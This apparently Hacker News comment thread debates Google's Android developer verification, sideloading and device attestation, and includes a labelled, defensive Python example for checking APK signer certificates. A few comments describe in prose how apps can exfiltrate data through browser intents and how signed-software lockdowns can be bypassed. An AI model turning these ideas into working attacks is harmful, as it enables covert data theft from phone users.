Cracked spotify? In my mind that's just like YouTube, almost entirely server-side. I guess you're talking about hijacking ads here, too? I feel like a "real" crack of Spotify would let you listen to music for free, but that should be impossible (unless their SWE's are incompetent).
My favorite was a local "discover which of your contacts is on the leaked Covid quarantine list[1]" scam app. It claimed that the extra permission dialogs are just fearmongering by Google, who is in cahoots with big pharma, and wants covid to spread to sell more medications.
[1] In fact, no such leak has ever taken place, its existence was just part of the setup for the scam.
It will not happen in the next 10 years. Right now people would just make generic launchers and then use them to manually load and execute any binary they please. Options include just writing your thingy in a scripting language and run it in node.exe, python.exe, or compile it to WASM, use native bindings of a scripting language, abuse a random verified electron app, ship with and use a random vulnerable driver, etc etc.
Even remotely getting to the point where locking Windows down to that degree would be possible is going to take MS a long time, fighting friction from users all the way. The whole ecosystem would have to change drastically for that sort of control to even be possible and make sense.
The holes aren't really there because it would be so hard to close them in a vacuum, they're there because decades of software people use rely on things working the old way. People aren't going to switch to a new OS on which almost nothing works anymore.
The saddest part is this is to the detriment of literally everyone except a couple rich owners of those companies. And everyone has the right to vote. But western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care.
If the vote came down to people in favor of walled gardens or in favor of forcing companies to open their platforms, with everyone else not voting, it would be a landslide. But there's no way to vote on it this way.
I am so sick of Google.
This is a monopoly with annual gross revenues bigger than all but 42 countries behaving this way.
They have conspired to control the web, browsers, mobile computing, and soon AI. It's sickening how much bad behavior they get away with.
They were able to use YouTube to bludgeon Windows Phone to death and become the de-facto mobile duopoly. Then they were able to get their shitty search engine on all the panes of glass, didn't care one iota about search quality (just ads), but were able to leverage their browser engine control to remove adblocking capabilities.
I hope the DOJ/FTC split Google into a dozen companies.
Sincerely.
There's no chance of that under the current regime. It loves bribery and Google has the money to get whatever they want.
Someone should hit surveillance-alt-delete!
There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
Seems like it wouldn't be much of a stretch to compare that statement to not starting a business because the economy is unfair. People indeed don't start businesses when the bureaucratic or tax overhead outweighs the financial benefit, but nobody loses sleep over an individual's hypothetical missed opportunity to learn a new skill but them. Doesn't matter to the platform owners unless it also stops being profitable, so it's their job to maintain the profitability for their ecosystem despite whatever barriers they put up.
so much extra work involved that isn't building the app.
I worry how this will affect fdroid etc.
I think they might just get away with it.
That's if they're available at all. In my country, only cell phones certified by the telecommunications government agency (ANATEL) can be imported, so the alternatives (Jolla, PinePhone, Fairphone) simply don't exist.
They do marvellous things like mandate weird Brazilian Android games on the phone I bought in Brazil.
Atlanta or Tbilisi?
I'm currently researching Android alternatives, including Librem and Jolla C2, and I'm skeptical that those will be compelling. It's just so sad.
If they have anything on the platform that is subject to the CRA, they are a distributor:
https://www.cyberresilienceact.eu/cra-guide-for-importers-di...
Use an iPhone, minimize my use of it. Continue to emphasize Linux on all my other devices. Move away from Google and Apple services to as much self-hosting as possible. Leverage TailScale to make my services accessible, globally, without actually exposing them on the internet. I'm just assuming that I will have to have some kind of attested device in order to run banking and payment apps and that might as well be a locked down device like an iPhone.
I'm not sure Google still has the ecosystem by the balls. It's very possible whatever Googlers who made this decision are the type of folks who don't comprehend they work for a monopoly that like actually can't do things like this anymore.
The intentions behind all the security hardware they introduced in pixel phones first, and is now required by play integrity to function might've been well-meaning, but that doesn't really matter in the end. Security features that the user can't control and bypass aren't security features - they're digital handcuffs.
https://learn.microsoft.com/en-us/windows/apps/develop/smart...
If google does that then it’s not the worst.
Worst is having to get my ID and all details scanned and processed by Google.
How will it go? Where are people going to go? People who draw a hard line on this can’t go to iOS for more freedom. Linux phones aren’t ready for prime time. So what’s left? Going back to a flip phone that doesn’t even have the capability of running apps in the same class?
Microsoft would love to do that too, but it just has too much of legacy software to introduce such a major hurdle.
Even with a signature they can't guarantee it doesn't have malware. The fact that signed malware exists should be enough to put an end to the argument that it's for our own good.
To meaningfully challenge it, developers need to agree to withhold supply like a cartel (illegal?) or union.
I think it’s probably close to the union scenario in an industry with a single employer, as there is that one-to-many relationship (all developers vs Google). Whereas a cartel is a few suppliers conspiring against all consumers.
I’m not sure developers would go to those lengths, and I’m not sure it would work either as the benefit is too high from defecting from such a coalition.
https://www.gnu.org/philosophy/right-to-read.en.html
The real heroes are the people that facilitate alternatives, not those who talk, and Stallman was of the talking variety.
I know quite some people who live this way, and are very willing to overcome inconvenient hurdles to avoid having to use such a spying device.
Nowhere does that require you to go and get a DUNS number, which is onerous for a single developer to do without the infrastructure of a company.
It seems kind of odd to me to rely on some kind of external hidden "credit agency"-style company for this? And why would DUNS want to know about some kid in their basement in Bangladesh making (non-malicious) apps, and why would the kid want Dun & Bradstreet to know about them? It makes no sense at all.
It's not that the identity prevents malware/abuse, but publishing any malware to the store burns the identity and establishing another is harder than simply coming up with a new email address. It's not necessarily the best scheme out there, but it makes sense given their apparent goal.
They do a lot of other horrible things too, they could expand the definition of malware.
You can see the zeitgeist forming around corporations wanting to lock out any small unlicensed company from working on phones.
The key is mostly fascism in the guise of "security". Witness stuff like the ICE tracker app. Google would love a way to freeze out both its appearance on the app store and any developer who'd program similar.
Which is exactly the same policy as Apple.
Over the years, it seems Google has been trying to have their cake and eat it too, by basically subsuming others to use Android through this appeal of a more free and open operating system ecosystem, but have tried to slowly close and close it down now that it has won the other half of the market on that promise.
This feels more sly, because it's kind of a bait and switch. Apple never made such claim and was always upfront, so while I don't like it, I never bought into it in the first place for them to have the rug pulled under me after giving them my money as Google might be doing.
Google Play is not open source. You're still free to sideload on phone that use vanilla open-source android like the Fairphone.
Apple will disagree and the first company doing worst than this, and is the world's first trillion dollars company.
Money talks.
One of those would be in corrupt countries you don’t have the „trusted 3rd party”
https://www.bbc.com/news/magazine-26328105
https://en.wikipedia.org/wiki/Parents_Music_Resource_Center
https://en.wikipedia.org/wiki/Seduction_of_the_Innocent
https://www.nytimes.com/1997/02/27/business/job-insecurity-o...
Yanking the leash of the proletariat
TikTok is "brain rot" even though the real economy runs on physical statistics, the semantics have to be recognizable to the elders, or it's not democratic so they will force the semantics to be regurgitated as-if they are religious catechism.
People that think this is unacceptable are not remotely average users. Average users benefit greatly from their pocket appliance not being a full fledged computer.
Fundamentally, it is a trust issue. Why should I be forced to trust Google or Apple has my best interests in mind (they don't)? That is not ensuring 'device integrity', it's ensuring that I am at the whims of a corporation which doesn't care about me and will leverage what it can to extract as much blood as it can from me. You can ensure 'device integrity' without putting any permanent trust in Google or Apple.
You are not.
It's certainly convenient in this modern world to pay for and use one of their devices though.
Limitations because it's not just protection - you don't get to choose which authorities you trust. Defaulting to manufacturer/OS vendor as the default authority would be ok, but there is no option to choose. Users have no power over their own device. That's not ok even if most choose to never execute it or don't know about it, it will lead to abuse of power.
Considering market forces are against it, I believe the only practical way to accomplish this in the long term is for this to be a right that is enforced by legislation. I don't think it is even far from precedent surrounding first sale doctrine and things like Magnuson-Moss, that the user should be the ultimate one in control post-purchase, it just takes a different shape when we're talking about computing technology.
What's being sacrificed in the name of security is not worth it imo.
Enabling side loading on android is not a standard setting you can flick on. Is there any data on the number of devices who have this enabled and are falling for hacked apps?
I'm all for code signing and integrity verification. We need both technologies on pretty much all devices.
You are just conflating two different issues - side loading has nothing to do with device integrity.
Android's value was always in being the open(ish) alternative. When we lose that choice and the whole world adopts one philosophy, the ecosystem becomes brittle.
We saw this with the Bell monopoly, which held up telephone innovation for three quarters of a century.
In the short term, some users are safer. In the medium term, all users suffer from the lack of competition and innovation that a duopoly of walled gardens will create.
In what way? Seriously, what benefit is there? (And don't say security...)
The world would be a much better place if we only had calls and direct messages.
> you have been infected by 3 viruses, click here in the next 5 minutes or the damage will be permanent
And they believe it. Giving them the power to run any software they want, also means giving everyone else the power to make them run any software they can be tricked into installing.
I'm deeply concerned about how this will impact users like us, especially since we're such a small minority that our desires could easily be trampled by the masses, but this is a clear win for the average user.
(And don't make the perfectionist fallacy w.r.t. Google not successfully preventing 100% of malware)
I do think it is in everyone's interest to be able to run software of your choosing on hardware you bought to own. The manufacturer needn't make it easy (my microwave sure didn't expect to install extra software packages; I don't expect them to open up an interface for this) but they also don't need to actively block the device owner from doing it
Right until their devices start to act against their will.
The device integrity you are talking about is integral only to Google and Apple. Not to you.
Now, that may happen anyway, but they'll give up a TON to avoid that.
Me, I try to avoid using my phone for anything important, use a VPN under Linux at home whenever possible, ad blockers, privacy guard, etc, etc. I can't expect my non-technical family members to do that.
Bad car analogy coming up: MOST drivers benefit more from ABS than the few really, really good race car drivers who can do threshold braking and outbrake ABS - and even then, I doubt it's true for anything but the earliest ABS systems. I'll bet the newest ABS systems are better than almost any human - because they don't have an off day, don't get distracted, etc.
And I get the anger - I'm an old school Atari 800xl / ST / DOS / Linux user who tries to ditch Windows where possible. Restricting things seems heavy-handed - and I don't trust Google in the least. But I would NEVER tell anyone in my family to sideload an app, even though they're all Android users - I don't want that support burden.
Why, though?
There's certainly no technical reason that a pocket appliance can't be a full fledged computer. The primary reason it isn't is because device manufacturers benefit greatly from having a tight control over their products. This is not unique to mobile devices; we see the same trend of desktop operating systems becoming increasingly user hostile as well.
The claim that these features are in the best interest of users is an inane excuse. Operating systems can certainly give users the freedom to use their devices to their full capabilities, without sacrificing their security or privacy. There are many ways that Google could implement this that doesn't involve being the global authority over which apps users are allowed to install. But, of course, they are in the advertising business, where all data that can be collected, must be collected.
People who think this is unacceptable are the people who 1) understand what it is, 2) don't stand to profit from it, and 3) don't dream about locking average users into an ecosystem that they control some day.
So yeah, it's different and more secure
Installer software signing certificates that will satisfy MS are prohibitively expensive for hobbyists (hundreds per year).
Currently the entire ecosystem is riddled with malware, spyware, or adware with shady source information and people have no way to verify the data practices
It isn't possible to ban encryption, so the governments have to chip away at security and privacy using these techniques.
From: https://developer.android.com/developer-verification
"You may also need to upload official government ID."
This won't end well for Google or the governments involved when the people get so angry that they are forced to roll this back. Switch to an alternative phone OS.
The amount of people this makes angry is so minuscule that it probably wouldn’t even pass one of those theatrical “sign this petition to get the government to discuss it” thingy. Mind you, the only reason the whole side-loading court cases were going forward is because a giganormous company (Epic) wanted to make more money instead of paying the Google/Apple tax. Not because some people were angry.
I don't think that's it. The desktop OS situation has historically been similar with 2 major large players and a bunch of insignificant ones.
This comes down to user expectation.
There are two OS platforms for desktop/laptop usage:
- MacOS
- Windows
These both contain ways to run arbitrary compiled code from an arbitrary source -- like a computer should. Losing this feature of our smartphones should have everyone concerned.
And they're both working towards taking that away.
For now we have Linux as a 3rd option, but that only exists so long as there's hardware available that'll let you run it. Can easily imagine a near-future where you can only get 'Windows hardware' or 'Apple hardware' and nothing modern that'll boot a 3rd-party OS.
For precedent, Microsoft locked down their own ARM hardware to Windows.
I'd be interested in further reading on Google's outreach to big banks and major finance CO's (or others) pushing for device attestation if you have any further reading.
This is political fantasy. There is no mechanism for "the people" to force anyone to roll this back. They can vote for the candidate owned by google, or the candidate owned by google. If they want to find another candidate, they'll have to use google to find one.
A very striking way to illustrate this is to look at the career histories of high government officials even very late into the Soviet Union. The last Minister of Coal, Mikhail Shchadov, was born in a village, worked in a mine, went to mining school for engineering, became head of his mine, and thereafter worked his way up the ranks until he was head of the whole apparatus. This story, not that of inherited wealth or monopolistic oligarchs, dominates the histories of Soviet ministers even very late in the decline of the Union.
Where is the "other set" of oligarchs of which you speak? There is none, which means there is hope for workers who might wish to enact fundamental economic change.
But often people try to project their opinions onto "the people" and predict they will rise up, and there's probably 100 predictions in comment sections that are completely spurious to every one that actually happens
So I'm not sure, but if I had to guess this one is a rare case where there may be real prospect of backlash.
I don't own a smartphone and I am happy as ever. I used to own one a while back, but it wasn't worth the effort and the rage when it was slow.
If a service can be accessed only with a smartphone, I complain (which is of little use).
in all things. I would encourage you and everyone who reads this post to stare down this option with realistic consideration. In a society this broken, it is the solution to more and more things. To checkout, to accept the hard mode because to pick the path of convenience is to be exploited.
Again, and again, and again.
What else are you growing?
This concept originated in China and is spreading. Beware.
> Mobile Payments
They work with a card, no smartphone required. Moreover, cash didn't cease to exist.
> Navigation
Again, physical maps are a thing. Google Maps or OpenStreetMap are accessible by browser. Having a physical map and having to follow road signs can be a beautiful experience. If one is addicted to a machine that tells them where to go, navigators are still a thing (no smartphone required)
>All manner of IoT devices
Don't put an IoT device in your house if you don't know what it does and how it works. If the only way to interface to it is via an app... then you don't know what it does and how it works. Don't put it in your house.
>Wearables
I don't even know what wearables are: if I write it on Firefox it underlines it in red. By doing a quick search, I can see images of watches. Watches can work without an app. Moreover, watches that work without an app are usually less expensive than the other kind.
>Digital versions of ID (Mobile Passport Control)
Don't. I know that some governments are pushing this crap thinking it's the future. Simply don't. Imagine you're at the airport and you accidentally drop your passport. You pick it up, nothing lost. Imagine you drop your phone and it stops working. You lost:
- Your documents
- Your money (if you rely on your phone for paying and don't have cash with you, which seems a growing trend among people I know)
- All your ways to contact people for help
Instead:
- Your wallet is stolen: you lost all your money and your cards, but you have your documents (at least the passport because it surely does not fit a wallet).
- Your phone is stolen: you lost all the ways to contact people, but you can buy another one.
- Your passport is stolen: you can contact your embassy.
Smartphones are becoming a SPOF (Single Point Of Failure) for our lives.
Are you for real? I'm totally on board with using free and open alternatives, but if you're not going on a mountain trail then a physical map is going to be drastically worse than any navigation software.
Also FWIW I have a card-sized passport that I can easily get stolen with my wallet.
* Mobile payments
* Navigation
* All manner of IoT devices
* Wearables!
* Digital versions of ID (Mobile Passport Control)
etc.
So no, you can't just use the web.
Same for basically every interaction with locals, for accessing government services, or even just using the public transportation.
It's pretty similar for locals AFAIK.
And before anyone replies that he didn't have to travel there — no, he did, unless he was willing to look for another job (which are very sparse here, you hold on to a good job for dear life).
At this point, I believe the most effective ways one can help with this is:
(1) advocacy - it's slow and difficult, but having people at least agree / be familiar with the idea that closed stuff is bad is a good first step.
Open ecosystems can't work for the general public if it's trapped in closed networks that won't work on anything else than the two big mobile operating systems, so making people start using open chat apps and such will help a lot. It'll take years, but so be it. It's worth it I think.
(2) helping improve the more open stuff.
I think Linux mobile for instance is a potentially viable alternative in the medium term for at least the basic use cases: Calls, SMS, GPS / Maps, Signal, photos. All this has no reason not to work with some polish. I daily drove Linux mobile 4 years ago for a year. The main thing I'm missing is good hardware for it, and a lot of polish but nothing impossible. Yeah, indeed, no payment with the phone (Google Pay / Apple Pay). But it's still possible to use the physical cards and not use the phone for this.
A locked-down Android is pointless.
I make relatively decent money by our standards, and I wouldn't even think about dropping $700-1000 on a phone (which isn't even officially sold or supported over here). For the vast majority of people it's their whole income over 2-4 months. I don't know or care how much you make, let's say it's $10k per month. Imagine if you had to pay $20-40k for a phone which is good for maybe 5-8 years.
And most of the world is like that.
BTW, all the GrapheneOS, etc. are still Android phones.
Obviously this is going to impact the supply of apps, since the market share of custom Android is smaller than even the market share of people willing to sideload or use an alternative store on a mainstream Android phone. Many developers might quit the game.
It wasn't OK in 2003. It wasn't OK in 2014. It isn't OK now. I'm just not sure what anybody can do about it.
[0] https://www.nytimes.com/2003/06/30/business/technology-a-saf...
I hope my tiny datapoint shows up in some aggregated stats somewhere.
It’s use-it-or-lose-it.
https://grapheneos.social/@GrapheneOS/115090818389369737
> "GrapheneOS doesn't include Google Mobile Services and the requirements for certification aren't relevant to us."
SailfishOS is pretty nice
I might get one next
https://developer.sony.com/open-source/aosp-on-xperia-open-d...
Basically none of this new restriction will bother me, since I don't run anything but stock AOSP and get all my apps from f-droid repos.
The final phase is "AI" monitoring everything you do on your devices. Eventually it won't just be passive, either, but likely active: able to change books you read and audio you listen to on-the-fly without your consent. It will be argued that this ok because the program is "objective".
https://furilabs.com/shop/flx1/
And if what you want is a PDA that runs Linux, there are many options, e.g. https://www.clockworkpi.com/home-uconsole.
For anyone else failing to resolve DNS for that domain: https://archive.is/q7w0x
Banking apps, messaging apps, streaming apps, even video games all want locked down devices. They will use hardware cryptography to discriminate against us and refuse service if they can't cryptographically prove we're using a corporate owned device.
Naughty user. Looks like you've been tampering with your device, installing unauthorized software and whatnot. Only money laundering drug trafficking child molesting terrorists do that. I'm gonna have to deny your request to log you into your bank account.
Is anyone working on fixing this? We can do so much better.
If they start selling their own devices, I will buy one and (assuming it turns out how I hope it will) recommend it strongly.
[0] https://grapheneos.social/@GrapheneOS/114665558894105287
[1] https://grapheneos.social/@GrapheneOS/114359660453627718
[1] https://grapheneos.org/usage#banking-apps
Fairphone from the Netherlands is another https://www.fairphone.com/
I have a Fairphone and I get updates pretty frequently so not sure what you mean?
The entire developer experience was fantastic and the thing that killed it was a lack of desire from the upper leadership when it felt like they couldn't compete with the duopoly.
Did you have a wince app? Too bad, throw away all that and rebuild for wp7.
Do you want to do anything useful? Actually, you better wait for wp7.5.
Oh look, we have a totally new thing with WP8. Upgrade to the newest framework so you can use the WP8 features... Oh, but you still need to build for the old framework for WP7. Hey, how about WP8.1, kind of the same deal.
My personal favorite though was WM10; you now need to build a Universal app that only runs on the very small number of WM10 phones... If you want to run on WP7 and WP8 which still have more sales, a universal app doesn't run there. Also, even though we said WP8 phones would be able to upgrade, either we changed our mind, or the experience is so bad most people won't. And the cherry on top... Users who upgrade from 8 to 10 might need to delete and reinstall the app, otherwise it will just show the loading dots.
Did we mention, we decided we didn't need engineers in Test in the run up to WM10? Couldn't possibly be why the release was terrible.
The infamous Franklin quote always comes to mind when I see things like this happening. Choose freedom over security while you still can, or you'll soon not even have the freedom to choose.
I guess words don't have meaning anymore. How can you claim to have an open system in an announcement about closing it down?
It's also telling that the big supporters of this are apparently corporations and governments. Admittedly I don't know what "Developer's Alliance" is but they don't seem to care about developers very much, and I wouldn't be surprised if they were just a "pay us to say what you're doing is good for devs" kind of thing.
Personally I would be fine with unsigned apps requiring the user to click through a notice before install, or having a setting to toggle to enable unsigned apps. Windows does something similar to this where unsigned binaries get a pop up warning but signed ones are executed immediately.
Doesn't this make it prohibitively difficult to do local builds of open source projects? It's been a long time since I've done this, but my recollection was that the process to do this was essentially you would build someone else's (the project's) package/namespace up through signing, but sign it locally with your own dev keys. A glance at the docs they've shared makes it sound like the package name essentially gets bound to an identity and you then can't sign it with another key. Am I misremembering and/or has something changed in this process? Am I missing something?
If this actually goes through, there will be no option in the mobile OS market for an OS that both:
a) allows the installation of apps without any contractual relationship with any party, and
b) allows the use of mainstream and secure apps like banking
If anything, they'd eventually deny access from desktop, forcing everyone to login via the fully managed mobile devices without any user freedom.
Some banks are already getting there btw, as their preferred 2fa is a companion app... One small step away from making that the only option, effectively denying access to anyone without a locked down mobile device.
You can apply for an HSBC Global Money Account if you have: […] The HSBC UK Mobile Banking app (Global Money is only available via the app)
From https://www.hsbc.co.uk/current-accounts/products/global-mone...
Ah, and it can only be installed in one device at the same time :D Don't have your phone available? Bad luck for you
I neither like nor understand this restriction. It makes device failure / loss / theft a much more difficult experience to recover from than it would otherwise be. The device should be throwaway. I specifically keep old phones in case something happens to the new one.
WhatsApp is probably the stupidest example of only being able to be on a single device (but I'm forced to use WhatsApp for one specific purpose, so I already resent it). Signal does the same thing, so maybe it's related to the E2EE that WhatsApp licensed from Signal...
Google started doing this for Gmail. To use Gmail on my laptop, I need to approve it with Gmail on my phone. I never signed up for this. I’m now afraid if I delete the Gmail app from my phone that I’ll lose access to my email.
I hate the direction “security” is taking us. It’s done in the name of security, but it feels more like blackmail to get and keep the company app on your phone.
Thankfully I don't actually rely on PayPal for anything serious, but there are artists whose commission I like to pay, and being able to actually pay them would be nice. :/
More info:
https://developer.android.com/developer-verification
https://support.google.com/googleplay/android-developer/answ...
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.
And of course basically every app requires internet permissions for ordinary behavior. The world where an explicit internet permission would somehow get somebody to look askance at some malware that they were about to download is just not believable.
I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.
It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).
To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issues MS had with GitHub (sanctions and KYC checks).
Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.
Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.
Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.
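The check that comment describes for an APK taken from an untrusted mirror, as an added example that is not part of the thread: it reads the signer certificate out of the APK Signing Block (Signature Scheme v2 only) and compares its SHA-256 with a digest pinned from a copy you already trust. The function names and the skeletal sample APK are constructed for illustration; the code reads the certificate the file claims and does not verify the signature over the contents, which the installer or `apksigner verify` does.

```python
import hashlib
import struct

APK_SIG_BLOCK_MAGIC = b"APK Sig Block 42"
V2_SCHEME_ID = 0x7109871A       # APK Signature Scheme v2 block ID
EOCD_MAGIC = b"PK\x05\x06"      # ZIP end-of-central-directory record


def _read_lp(buf: bytes, off: int):
    """Read one uint32-length-prefixed field; return (field, next_offset)."""
    if off + 4 > len(buf):
        raise ValueError("truncated length prefix")
    (n,) = struct.unpack_from("<I", buf, off)
    end = off + 4 + n
    if end > len(buf):
        raise ValueError("length prefix runs past end of buffer")
    return buf[off + 4:end], end


def _signing_block_pairs(apk: bytes) -> dict:
    """Find the APK Signing Block (it sits immediately before the ZIP
    central directory) and return its {id: value} pairs."""
    eocd = apk.rfind(EOCD_MAGIC)
    if eocd < 0 or eocd + 22 > len(apk):
        raise ValueError("not a ZIP: no end-of-central-directory record")
    (cd_off,) = struct.unpack_from("<I", apk, eocd + 16)
    if cd_off < 32 or cd_off > eocd:
        raise ValueError("implausible central directory offset")
    if apk[cd_off - 16:cd_off] != APK_SIG_BLOCK_MAGIC:
        raise ValueError("no APK Signing Block (v1-only or unsigned APK)")
    (size,) = struct.unpack_from("<Q", apk, cd_off - 24)
    start = cd_off - size - 8
    if size < 24 or start < 0:
        raise ValueError("bad APK Signing Block size")
    if struct.unpack_from("<Q", apk, start)[0] != size:
        raise ValueError("APK Signing Block size fields disagree")
    pairs, body, off = {}, apk[start + 8:cd_off - 24], 0
    while off < len(body):
        if len(body) - off < 12:
            raise ValueError("truncated ID-value pair")
        (plen,) = struct.unpack_from("<Q", body, off)
        if plen < 4 or off + 8 + plen > len(body):
            raise ValueError("malformed ID-value pair")
        (pid,) = struct.unpack_from("<I", body, off + 8)
        pairs[pid] = body[off + 12:off + 8 + plen]
        off += 8 + plen
    return pairs


def signer_cert_sha256(apk: bytes) -> list:
    """Hex SHA-256 of each v2 signer's first (signing) certificate."""
    pairs = _signing_block_pairs(apk)
    if V2_SCHEME_ID not in pairs:
        raise ValueError("no v2 signature in the signing block")
    signers, _ = _read_lp(pairs[V2_SCHEME_ID], 0)
    digests, off = [], 0
    while off < len(signers):
        signer, off = _read_lp(signers, off)
        signed_data, _ = _read_lp(signer, 0)
        _content_digests, nxt = _read_lp(signed_data, 0)
        certs, _ = _read_lp(signed_data, nxt)
        first_cert, _ = _read_lp(certs, 0)
        digests.append(hashlib.sha256(first_cert).hexdigest())
    return digests


def matches_pin(apk: bytes, pinned_sha256: str) -> bool:
    """True only if the APK parses and every v2 signer is the pinned one."""
    try:
        found = signer_cert_sha256(apk)
    except (ValueError, struct.error):
        return False
    return bool(found) and all(d == pinned_sha256.lower() for d in found)


def build_constructed_apk(cert: bytes) -> bytes:
    """Constructed sample input: a skeletal ZIP whose v2 block carries `cert`.
    It is not installable; it has only the fields this parser reads."""
    lp = lambda b: struct.pack("<I", len(b)) + b
    signed_data = lp(b"") + lp(lp(cert)) + lp(b"")   # digests, certs, attrs
    signer = lp(signed_data) + lp(b"") + lp(b"")     # + signatures, public key
    value = lp(lp(signer))                           # sequence of signers
    pair = struct.pack("<QI", len(value) + 4, V2_SCHEME_ID) + value
    size = struct.pack("<Q", len(pair) + 24)
    block = size + pair + size + APK_SIG_BLOCK_MAGIC
    entries = b"constructed-zip-entries"
    cd_off = len(entries) + len(block)               # empty central directory
    eocd = EOCD_MAGIC + struct.pack("<HHHHIIH", 0, 0, 0, 0, 0, cd_off, 0)
    return entries + block + eocd


if __name__ == "__main__":
    original = build_constructed_apk(b"constructed-cert-original-developer")
    resigned = build_constructed_apk(b"constructed-cert-unknown-resigner")
    pin = signer_cert_sha256(original)[0]
    print("original matches pin:", matches_pin(original, pin))
    print("re-signed copy matches pin:", matches_pin(resigned, pin))
```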
It's been there since Android 1.0.
What's missing is a way for the user to deny it.
Google mostly doesn't let you deny permissions while running apps that require them; recently there's some permissions that you can pick at runtime. So it's not surprising that they don't let you deny this one, when they don't even show it in the store.
https://developer.android.com/develop/connectivity/network-o...
The internet permission has nothing to do with ads? It's a hidden permission because:
1) Internet connection is so ubiquitous as to just be noise if displayed
2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
That doesn't make it any less useful.
> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?
Because it is obvious. Just open a web browser.
More details here: https://old.reddit.com/r/androiddev/comments/ci4tdq/were_on_...
Hey we were already on board with this, you don't have to convince us.
You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?
I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.
I personally won't be doing this verification for my open-source apps. I have no interest in any kind of business relationship with anyone just to publish an .apk. If that limits those who can install it to people who disable Play Protect globally, then oh well.
Oh, yes... Actually I remember: it was a long slow series of accepting small artificial restrictions. I remember people laughing at me at the time. They said it won't matter, they didn't care, that I was paranoid...
Now... Here we are.
> The tech giant stresses that this does not mean developers can’t distribute outside of the Play Store through other app stores or via sideloading — Android will remain open in that regard.
These big companies need to be broken into a thousand pieces. They’re starting to become the gatekeepers of participating in society.
> I'd bet money they'd just ban them; the whole point is to stop users running unapproved applications on their phones.
I wasn't trying to claim everything is hunky dory, just that they aren't "going to just ban" other app stores.
>The Play Store implemented similar requirements in 2023, but Google is now mandating this for all install methods, including third-party app stores and sideloading where you download an APK file from a third-party source.
If I'm not allowed to develop and install my own apps on my own phone, what advantage does Android have over Apple?
> NSA: Linux Journal is an "extremist forum" and its readers get flagged for extra surveillance [0]
Looks like this is a part of the move toward Chat Control and ending E2E encryption.
[0] https://www.linuxjournal.com/content/nsa-linux-journal-extre...
Google can't even stop the scam ai companion apps on the play store that all use the same backend full of characters...
Google also can't stop the huge wave of scam Bitcoin ads impersonating Canadian media outlets, with ai generated pictures and videos of politicians.
Get real Google.
I've seen a lot of similar sentiment on this thread, but the reason I use Android is because it gives me more control than iOS by allowing full-on painless sideloading, and custom distributions like GrapheneOS. They're doing everything they can to turn themselves into a worse Apple. All of the downsides of Apple, but none of the upsides. Apple beats them in every aspect that isn't "openness".
When will the straw break the camel's back? I'm shocked we've let it get to this point with no realistic alternatives. There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
Yes there is. You all don't understand that they will use remote attestation to force everyone to use approved devices with signed apps on signed OSes only
You won't be able to bank, call a cab, write a chat message, watch a youtube video or do anything relevant on a device anymore that isn't signed, approved and controlled by google. They've made us cattle and now they are going to milk us dry.
There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
In my country, only cell phones certified by the government telecommunications agency (Anatel) can be imported, so I can't for instance go to the Jolla or PinePhone store and buy a Linux-based smartphone; if I tried, it would be sent back the moment the package entered the country. (See https://www.gov.br/anatel/pt-br/regulado/certificacao-de-pro... for details.)
Funnily, Google is one of the few phone manufacturers who can’t make emergency calls work. (e.g. search Pixel problems)
Ah, then I guess everything is fine. I'm sure they aren't in favour because it gives governments greater control over what apps we're allowed to have on our phones. That would be absurd.
